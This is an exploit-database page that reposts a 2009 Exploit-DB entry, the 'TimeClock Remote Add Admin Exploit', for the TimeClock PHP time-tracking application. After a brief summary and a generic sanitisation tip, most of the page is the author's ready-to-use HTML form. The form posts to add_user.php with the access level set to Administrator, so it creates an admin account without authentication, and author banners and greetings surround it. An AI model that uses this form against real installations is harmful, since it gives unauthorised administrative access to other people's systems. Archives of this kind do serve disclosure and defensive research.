header-logo
Suggest Exploit
vendor:
TimeClock
by:
ViRuSMaN
9,3
CVSS
HIGH
Remote Code Execution
78
CWE
Product Name: TimeClock
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

TimeClock Remote Add Admin Exploit

TimeClock is a free open-source application released under the GPL. It is vulnerable to a Remote Code Execution vulnerability due to an insecure form submission. An attacker can exploit this vulnerability by crafting a malicious form submission to the add_user.php script, which will add an administrator user to the application. This can be used to gain access to the application and potentially execute arbitrary code on the server.

Mitigation:

Ensure that all user input is properly sanitized and validated before being used in the application.
Source

Exploit-DB raw data:

==============================================================================
        [»] ~ Note : [ Tribute to the martyrs of Gaza . ]
==============================================================================
        [»] TimeClock Remote Add Admin Exploit
==============================================================================

    [»] Script:             [ TimeClock ]
    [»] Language:           [ PHP ]
    [»] Site page:          [ timeclock-software is a free open-source application released under the GP. ]
    [»] Download:           [ http://www.hormiga.org/zonamac/descargas/timeclock-software.zip ]
    [»] Founder:            [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
    [»] Greetz to:          [ HackTeach Team , Egyptian Hackers , All My Friends & Pentestlabs.Com ]
    [»] My Home:            [ HackTeach.Org , Islam-Attack.Com ]

###########################################################################

===[ Exploit ]===

<html>
<head>
<title>TimeClock Remote Add Admin Exploit[By:MvM]</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>

<body>

<form method="post" action="http://localhost/scripts/add_user.php">
<table border="1">
<tr>
<td align="center"><b>Adding User</b></td>
</tr>
<tr>
<td>
<table>
<tr>
<td align="right">First Name:&nbsp;</td><td align="left"><input type="text" name="fname" size="30"></td>
</tr>
<tr>
<td align="right">Last Name:&nbsp;</td><td align="left"><input type="text" name="lname" size="30"></td>
</tr>
<tr>
<td align="right">Access Level:&nbsp;</td>
<td>
<select name="access_level">
<option value="Administrator">Administrator</option>
<option value="User">User</option>
</select>
</td>
</tr>
<tr>
<td align="right">Username:&nbsp;</td><td align="left"><input type="text" name="u_name" size="30"></td>
</tr>
<tr>
<td align="right">Password:&nbsp;</td><td align="left"><input type="text" name="user_password" size="30"></td>
</tr>
<tr>
<td>&nbsp;</td><td><input type="submit" name="submit" value="Add" class="button">&nbsp;<input type="submit" name="cancel" value="Cancel" class="button"></td>
</tr>
</table>
</td>
</tr>
</table>
</form>
</body>
</html>

Author: ViRuSMaN <-

###########################################################################

Navigation

Suggest Exploit

Services By CQR